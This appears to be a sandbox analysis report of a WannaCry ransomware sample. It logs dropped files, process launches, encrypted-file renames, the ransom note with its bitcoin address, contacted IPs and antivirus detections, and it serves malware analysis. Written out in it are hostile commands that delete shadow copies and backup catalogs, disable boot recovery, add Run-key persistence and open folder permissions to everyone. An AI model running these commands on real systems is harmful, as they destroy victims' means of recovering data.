file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sk\~SDAA2.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\de
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\id
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\zu\~SDDD5.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\es_419
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\128.png.WNCRY
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_16.png.WNCRYT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ka\~SDE67.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ro\~SD1006.tmp
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRY
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\zh_CN\~SD12E3.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\ro
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lv\~SD857.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ms
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\id\~SDD1D.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths
file C:\Users\test22\AppData\Local\Temp\36401687182996.bat
file C:\Users\test22\AppData\Local\Temp\taskdl.exe
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\tor.exe
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libeay32.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent_core-2-0-5.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
file C:\Users\test22\AppData\Local\Temp\m.vbs
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent_extra-2-0-5.dll
file C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
file C:\Users\test22\AppData\Local\Temp\taskse.exe
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\zlib1.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\ssleay32.dll
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000140
filepath: C:\Users\test22\Desktop\~SDF83A.tmp
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\Desktop\~SDF83A.tmp
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 3 (FILE_OVERWRITTEN)
share_access: 0 ()
1 0 0

file C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
cmdline wmic shadowcopy delete
cmdline cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
cmdline cmd.exe /c start /b @WanaDecryptor@.exe vs
cmdline cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\zlib1.dll
file C:\Users\test22\AppData\Local\Temp\taskdl.exe
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
file C:\Users\test22\AppData\Local\Temp\taskse.exe
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\ssleay32.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libeay32.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent_extra-2-0-5.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent_core-2-0-5.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\tor.exe
file C:\Users\test22\AppData\Local\Temp\u.wnry
file C:\Users\test22\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
wmi SELECT * FROM Win32_ShadowCopy
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2720
thread_handle: 0x00000064
process_identifier: 2716
current_directory:
filepath:
track: 1
command_line: attrib +h .
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000068
1 1 0

CreateProcessInternalW

thread_identifier: 2764
thread_handle: 0x00000064
process_identifier: 2760
current_directory:
filepath:
track: 1
command_line: icacls . /grant Everyone:F /T /C /Q
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000068
1 1 0

CreateProcessInternalW

thread_identifier: 2876
thread_handle: 0x00000110
process_identifier: 2872
current_directory:
filepath:
track: 1
command_line: taskdl.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000114
1 1 0

CreateProcessInternalW

thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: @WanaDecryptor@.exe fi
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000000
0 0

CreateProcessInternalW

thread_identifier: 2928
thread_handle: 0x0000011c
process_identifier: 2924
current_directory:
filepath:
track: 1
command_line: 36401687182996.bat
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000114
1 1 0

CreateProcessInternalW

thread_identifier: 196
thread_handle: 0x00000154
process_identifier: 152
current_directory:
filepath:
track: 1
command_line: @WanaDecryptor@.exe co
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000164
1 1 0

CreateProcessInternalW

thread_identifier: 2196
thread_handle: 0x00000154
process_identifier: 2192
current_directory:
filepath:
track: 1
command_line: cmd.exe /c start /b @WanaDecryptor@.exe vs
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000164
1 1 0

CreateProcessInternalW

thread_identifier: 744
thread_handle: 0x00000170
process_identifier: 800
current_directory:
filepath:
track: 1
command_line: taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000dc
1 1 0

CreateProcessInternalW

thread_identifier: 1560
thread_handle: 0x000000dc
process_identifier: 1504
current_directory:
filepath:
track: 1
command_line: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000170
1 1 0

CreateProcessInternalW

thread_identifier: 1520
thread_handle: 0x00000178
process_identifier: 884
current_directory:
filepath:
track: 1
command_line: taskdl.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000174
1 1 0

CreateProcessInternalW

thread_identifier: 2788
thread_handle: 0x00000174
process_identifier: 2780
current_directory:
filepath:
track: 1
command_line: taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000178
1 1 0

CreateProcessInternalW

thread_identifier: 940
thread_handle: 0x000000dc
process_identifier: 1080
current_directory:
filepath:
track: 1
command_line: taskdl.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000174
1 1 0

CreateProcessInternalW

thread_identifier: 2524
thread_handle: 0x00000174
process_identifier: 1736
current_directory:
filepath:
track: 1
command_line: taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000dc
1 1 0

CreateProcessInternalW

thread_identifier: 2828
thread_handle: 0x00000164
process_identifier: 2748
current_directory:
filepath:
track: 1
command_line: taskdl.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000160
1 1 0

CreateProcessInternalW

thread_identifier: 2532
thread_handle: 0x00000160
process_identifier: 2124
current_directory:
filepath:
track: 1
command_line: taskse.exe C:\Users\test22\AppData\Local\Temp\@WanaDecryptor@.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000164
1 1 0

CreateProcessInternalW

thread_identifier: 2600
thread_handle: 0x00000124
process_identifier: 2592
current_directory:
filepath:
track: 1
command_line: TaskData\Tor\taskhsvc.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000114
1 1 0

CreateProcessInternalW

thread_identifier: 2748
thread_handle: 0x00000114
process_identifier: 2728
current_directory:
filepath:
track: 1
command_line: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000110
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 14
family: 2
1 0 0
section name: .rsrc, size_of_data: 0x0034a000, virtual_address: 0x00010000, virtual_size: 0x00349fa0, entropy: 7.999867975099674 description A section with a high entropy has been found
entropy 0.982497082847 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTcbPrivilege
1 1 0

url http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url http://purl.org/rss/1.0/
url https://en.wikipedia.org/wiki/Bitcoin
url http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
url http://www.passport.com
url https://www.google.com/search?q=how
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Perform crypto currency mining rule BitCoin
description Steal credential rule local_credential_Steal
description Hijack network configuration rule Hijack_Network
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Match Windows Http API call rule Str_Win32_Http_API
description Virtual currency rule Virtual_currency_Zero
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description Escalate privileges rule Escalate_priviledges
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Install itself for autorun at Windows startup rule Persistence
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
cmdline wmic shadowcopy delete
cmdline cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
cmdline attrib +h .
cmdline reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "dhattnjpato996" /t REG_SZ /d "\"C:\Users\test22\AppData\Local\Temp\tasksche.exe\"" /f
cmdline cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
host 163.172.13.165
host 171.25.193.9
host 193.11.164.243
host 81.7.10.93
host 89.147.109.179
file C:\Users\All Users\Microsoft\Microsoft Antimalware\~SD4D0.tmp
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt.WNCRYT
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt.WNCRY
file C:\Users\All Users\Microsoft\Microsoft Antimalware
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\~SD4D1.tmp
file C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\~SD4D2.tmp
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file C:\Users\All Users\Microsoft\Microsoft Security Client\Support
file C:\Users\All Users\Microsoft\Microsoft Security Client
file C:\Users\All Users\Microsoft\Microsoft Security Client\~SD4E3.tmp
file C:\Users\All Users\Microsoft\Microsoft Security Client\Support\~SD4E4.tmp
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\dhattnjpato996 reg_value "C:\Users\test22\AppData\Local\Temp\tasksche.exe"
command cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
file C:\Users\test22\AppData\Roaming\tor\key-pinning-entries
file C:\Users\test22\AppData\Roaming\tor\state
file C:\Users\test22\AppData\Roaming\tor\unverified-microdesc-consensus
Time & API Arguments Status Return Repeated

NtWriteFile

buffer: Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
offset: 0
file_handle: 0x0000011c
filepath: C:\Users\test22\AppData\Local\Temp\@Please_Read_Me@.txt
1 0 0
cmdline wmic shadowcopy delete
cmdline vssadmin delete shadows /all /quiet
Process injection Process 2192 resumed a thread in remote process 2264
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2264
1 0 0
cmdline icacls . /grant Everyone:F /T /C /Q
cmdline vssadmin delete shadows /all /quiet
cmdline cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
file C:\Users\test22\AppData\Roaming\tor\cached-certs
file C:\Users\test22\AppData\Roaming\tor\cached-consensus
file C:\Users\test22\AppData\Roaming\tor\cached-descriptors
file C:\Users\test22\AppData\Roaming\tor\geoip
file C:\Users\test22\AppData\Roaming\tor\state
Bkav W32.WannaCrypLTQ.Trojan
Lionic Trojan.Win32.Wanna.toNn
tehtris Generic.Malware
DrWeb Trojan.Encoder.11432
MicroWorld-eScan Trojan.Ransom.WannaCryptor.A
FireEye Generic.mg.84c82835a5d21bbc
CAT-QuickHeal Ransom.WannaCrypt.A4
ALYac Trojan.Ransom.WannaCryptor
Cylance unsafe
Zillya Trojan.WannaCry.Win32.2
Sangfor Ransom.Win32.Wannacrypt_0.se2
K7AntiVirus Trojan ( 0050d7171 )
Alibaba Ransom:Win32/WannaCry.ali1020010
K7GW Trojan ( 0050d7171 )
Cybereason malicious.5a5d21
BitDefenderTheta Gen:NN.ZexaF.36250.wt0@aGEmS3di
VirIT Trojan.Win32.WannaCry.B
Cyren W32/Trojan.ZTSA-8671
Symantec Ransom.Wannacry
Elastic malicious (high confidence)
ESET-NOD32 Win32/Filecoder.WannaCryptor.D
Cynet Malicious (score: 100)
APEX Malicious
ClamAV Win.Ransomware.Wannacryptor-9940180-0
Kaspersky Trojan-Ransom.Win32.Wanna.zbu
BitDefender Trojan.Ransom.WannaCryptor.A
NANO-Antivirus Trojan.Win32.Ransom.eoptnj
Avast Win32:WanaCry-A [Trj]
Tencent Trojan-Ransom.Win32.WannaCry.kd
TACHYON Ransom/W32.WannaCry.Zen
Sophos Troj/Ransom-EMG
F-Secure Trojan.TR/Ransom.JB
Baidu Win32.Trojan.WannaCry.c
VIPRE Trojan.Ransom.WannaCryptor.A
TrendMicro Ransom_WANA.A
McAfee-GW-Edition BehavesLike.Win32.RansomWannaCry.wc
Trapmine malicious.high.ml.score
Emsisoft Trojan.Ransom.WannaCryptor.A (B)
Ikarus Trojan-Ransom.WannaCry
Jiangmin Trojan.Wanna.eo
Webroot W32.Ransom.Wannacry
Avira TR/Ransom.JB
Antiy-AVL Trojan[Ransom]/Win32.Scatter
Microsoft Ransom:Win32/WannaCrypt
Gridinsoft Malware.Win32.Gen.bot!se54409
Xcitium TrojWare.Win32.Ransom.WannaCrypt.B@719b9h
Arcabit Trojan.Ransom.WannaCryptor.A
ViRobot Trojan.Win32.S.WannaCry.3514368.N
ZoneAlarm Trojan-Ransom.Win32.Wanna.zbu
GData Win32.Trojan-Ransom.WannaCry.A
Time & API Arguments Status Return Repeated

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Desktop\readme.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Desktop\readme.txt.WNCRYT
newfilepath: C:\Users\test22\Desktop\readme.txt.WNCRY
oldfilepath: C:\Users\test22\Desktop\readme.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRYT
newfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRY
oldfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRYT
newfilepath: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRY
oldfilepath: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

